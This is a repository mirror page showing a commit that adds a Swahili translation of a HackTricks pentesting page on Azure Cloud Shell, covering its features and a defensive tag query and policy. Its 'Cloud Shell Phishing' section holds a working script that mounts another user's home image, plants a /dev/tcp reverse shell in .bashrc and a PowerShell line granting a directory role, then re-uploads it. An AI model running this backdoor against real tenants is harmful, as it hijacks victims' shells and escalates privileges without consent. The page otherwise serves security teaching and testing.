gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-05 19:32:24 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-services/az-cloud-sh

Browse Source
This commit is contained in:
Translator
2025-02-21 13:57:27 +00:00
parent c2f71e612a
commit c3bf39d3fc
1 changed files with 96 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

103
src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
View File

@@ -10,19 +10,108 @@ Hakuna ruhusa zilizotolewa kwa huduma hii, kwa hivyo hakuna mbinu za kupandisha
### Key Features
**Environment**: Azure Cloud Shell inatoa mazingira salama kwa kukimbia kwenye Azure Linux, usambazaji wa Linux wa Microsoft ulioandaliwa kwa ajili ya miundombinu ya wingu. Pakiti zote zilizojumuishwa katika hifadhi ya Azure Linux zimeandaliwa kwa ndani na Microsoft ili kulinda dhidi ya mashambulizi ya mnyororo wa usambazaji.
**Preinstalled Tools**: Cloud Shell inajumuisha seti kamili ya zana zilizowekwa awali kama vile Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, na wahariri wa maandiko kama vim, nano, na emacs. Zana hizi ziko tayari kutumika. Ili kuorodhesha pakiti na moduli zilizowekwa unaweza kutumia "Get-Module -ListAvailable", "tdnf list" na "pip3 list".
**$HOME persistence**: Unapozindua Azure Cloud Shell kwa mara ya kwanza, unaweza kuitumia na au bila akaunti ya kuhifadhi iliyounganishwa. Kuchagua kutounganisha kuhifadhi kunaunda kikao cha muda ambapo faili zinafuta wakati kikao kinapomalizika. Ili kuhifadhi faili kati ya vikao, ungana na akaunti ya kuhifadhi, ambayo inajunganishwa kiotomatiki kama **$HOME\clouddrive**, huku saraka yako ya **$HOME** ikihifadhiwa kama faili **.img** katika Azure File Share. Hata hivyo, faili zilizo nje ya $HOME na hali za mashine hazihifadhiwi. Ili kuhifadhi kwa usalama siri kama funguo za SSH, tumia Azure Key Vault.
**Azure drive (Azure:)**: PowerShell katika Azure Cloud Shell inajumuisha diski ya Azure (Azure:), ambayo inaruhusu urahisi wa kuvinjari rasilimali za Azure kama Compute, Network, na Storage kwa kutumia amri kama za mfumo wa faili. Badilisha kwenda diski ya Azure kwa cd Azure: na rudi kwenye saraka yako ya nyumbani kwa cd ~. Unaweza bado kutumia cmdlets za Azure PowerShell kusimamia rasilimali kutoka diski yoyote.
**Custom Tool Installation**: Watumiaji wanaoandika Cloud Shell na akaunti ya kuhifadhi wanaweza kufunga zana za ziada ambazo hazihitaji ruhusa za mzizi. Kipengele hiki kinaruhusu uboreshaji zaidi wa mazingira ya Cloud Shell, ikiwapa watumiaji uwezo wa kubinafsisha mipangilio yao kulingana na mahitaji yao maalum.
- **Zana Zilizowekwa Awali**: Cloud Shell inajumuisha seti kamili ya zana zilizowekwa awali kama Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, na wahariri wa maandiko kama vim, nano, na emacs. Zana hizi ziko tayari kutumika. Ili orodhesha pakiti na moduli zilizowekwa, unaweza kutumia "Get-Module -ListAvailable", "tdnf list" na "pip3 list".
- **Drive ya Azure (Azure:)**: PowerShell katika Azure Cloud Shell inajumuisha drive ya Azure (Azure:), ambayo inaruhusu urahisi wa kuvinjari rasilimali za Azure kama Compute, Network, na Storage kwa kutumia amri kama za mfumo wa faili. Badilisha kwenda kwenye drive ya Azure kwa cd Azure: na rudi kwenye directory yako ya nyumbani kwa cd ~. Unaweza bado kutumia cmdlets za Azure PowerShell kusimamia rasilimali kutoka kwa drive yoyote.
- **Usanidi wa Zana za Kijadi**: Watumiaji wanaoanzisha Cloud Shell na akaunti ya hifadhi wanaweza kufunga zana za ziada ambazo hazihitaji ruhusa za mzizi. Kipengele hiki kinaruhusu uboreshaji zaidi wa mazingira ya Cloud Shell, kikimuwezesha mtumiaji kubinafsisha usanidi wao kulingana na mahitaji yao maalum.
- **$HOME kudumu**: Unapoanzisha Azure Cloud Shell kwa mara ya kwanza, unaweza kuitumia na au bila akaunti ya hifadhi iliyounganishwa.
- Kuchagua kutounganisha hifadhi kunaunda kikao cha muda ambapo faili zinafuta wakati kikao kinapomalizika.
- Ili kuhifadhi faili kati ya vikao, unapata chaguo la **kuunganisha akaunti ya hifadhi**, ambayo inounganishwa kiotomatiki kama `$HOME\clouddrive`, huku directory yako ya `$HOME` **ikiokolewa kama faili ya .img katika Sehemu ya Faili.**
## References
### Cloud Shell Phishing
Ikiwa mshambuliaji atapata picha za watumiaji wengine katika Akaunti ya Hifadhi ambayo ana ufikiaji wa kuandika na kusoma, ataweza kupakua picha hiyo, **kuongeza nyuma ya bash na PS ndani yake**, na kuipakia tena kwenye Akaunti ya Hifadhi ili wakati mtumiaji atakapofikia shell, **amri zitatekelezwa kiotomatiki**.
- **Pakua, nyuma na upakia picha:**
```bash
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>
# Mount image
cd /tmp/phishing_img/.cloudconsole
mkdir /tmp/cloudpoison
sudo mount acc_username.img /tmp/cloudpoison
cd /tmp/cloudpoison
sudo mkdir .config
sudo mkdir .config/PowerShell
sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Bash backdoor
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
# PS backdoor
echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
cd /tmp
sudo umount /tmp/cloudpoison
# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"
```
- **Kisha, mwongoze mtumiaji kufikia https://shell.azure.com/**
### Pata & Zuia Akaunti za Hifadhi za Cloud Shell
Akaunti za hifadhi zilizoundwa na Cloud Shell zimewekwa alama na **`ms-resource-usage:azure-cloud-shell`**. Inawezekana kuunda sera ya rasilimali ya Azure inayozuia kuunda rasilimali zenye alama hii.
Pata akaunti zote za hifadhi zilizoundwa na Cloud Shell kwa alama:
```bash
az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'
```
Sera ya kuzuia uundaji wa akaunti za hifadhi za kiotomatiki kwa ajili ya hifadhi ya cloud shell kulingana na lebo:
```json
{
displayName: "Restrict cloud shell storage account creation",
description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
metadata: {
category: "Storage",
version: "1.0.0"
},
mode: "All",
parameters: {
effect: {
type: "String",
metadata: {
displayName: "Effect",
description: "Deny, Audit or Disabled the execution of the Policy"
},
allowedValues: [
"Deny",
"Audit",
"Disabled"
],
defaultValue: "Audit"
}
},
policyRule: {
if: {
allOf: [
{
field: "type",
equals: "Microsoft.Storage/storageAccounts"
},
{
field: "tags['ms-resource-usage']",
equals: "azure-cloud-shell"
}
]
},
then: {
effect: "[parameters('effect')]"
}
}
}
```
## Marejeo
- [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
- [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
- [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
## Persistence
## Kudumu
{{#ref}}
../az-persistence/az-cloud-shell-persistence.md